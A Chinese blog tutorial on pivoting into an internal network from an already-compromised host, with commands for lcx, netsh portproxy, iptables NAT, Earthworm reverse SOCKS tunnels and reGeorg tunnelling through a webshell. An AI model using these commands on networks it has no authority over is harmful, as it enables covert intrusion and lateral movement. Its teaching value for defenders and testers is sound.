赞
踩
作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途
想从外网渗透内网主机,但内网很多主机不直接连外网,所以要进行搭建通道
(前提是已经控制了一台主机,通过这台主机渗透其他内网主机)
win端口转发:lcx.exe netsh
linux端口转发:portmap iptables
多平台:Earthworm
端口复用:reGeorg
win平台的一款老工具。
(好用是好用,就是被放进全家桶了)
//端口转发(listen和slave)
lcx.exe -listen 8080 8081 //监听两个端口
lcx.exe -slave 192.168.1.128 8080 192.168.1.131 8888 //连接128:8080端口时映射到131:8888端口
//端口映射(tran)
lcx -tran 8888 127.0.0.1 3306 //把8088端口映射到3306端口
win平台内置的命令
运行cmd
//xp需要安装ipv6
netsh interface ipv6 install
开启防火墙需要放行tcp端口
//设置一个规则v4tov4,访问192.168.1.132:6666端口会转发到192.168.1.128:3389端口
netsh interface portproxy set v4tov4 listenaddress=192.168.1.132 listenport=6666 connectaddress=192.168.1.128 connectport=3389
取消端口转发
netsh interface portproxy delete v4tov4 listenaddress=192.168.1.132 listenport=3389
查看已有配置
netsh interface portproxy show v4tov4
netsh interface portproxy show all
linux的端口转发
开启内核转发
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -p
配置端口转发
//正向代理
//访问192.168.1.131:8888跳转到192.168.1.128:80
iptables -t nat -A PREROUTING --dst 192.168.1.131 -p tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING --dst 192.168.1.128 -p tcp --dport 80 -j SNAT --to-source 192.168.1.131
service iptables save && service iptables start //保存重启
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.1.128 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.1.131
//本机之间端口转发
iptables -t nat -A PREROUTING -p tcp --dport 8888 -j REDIRECT --to-ports 3389
service iptables save && service iptables start //保存重启
代理和端口转发一身的多平台工具(win,linux,mac之间来回穿透)
//正向连接
ew_win32.exe -s ssocksd -l 8082 //直接变成socks5代理服务器
//反向连接
ew_win32.exe -s rcsocks -l 8081 -e 8082 //监听本机8082端口,等待内网主机连接,访问本机8081就能链接内网
ew_win32.exe -s rssocks -d 192.168.1.1 -e 8082 //内网主机转发到外网8082端口
一个端口运行多个应用
(适用于服务器只开放了80端口,就凑合一下一起从80端口进出数据)
(有很好的隐藏后门,不用再开通个端口)
Python2.7写的一款工具,结合Webshell从80端口进行传输。
支持多种语言
https://github.com/sensepost/reGeorg
python2 reGeorgSocksProxy.py -l <监听地址> -p <本地服务监听的端口> -u <Webshell地址>
python2 reGeorgSocksProxy.py -l 192.168.1.131 -p 9999 -u http://192.168.1.128/tunnel.nosocket.php
搭建好以后,就可以通过浏览器添加代理,或用socks5工具等等配置全局代理啥的。
获取工具
可关注微信公众号:XG小刚
回复:内网穿透工具
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。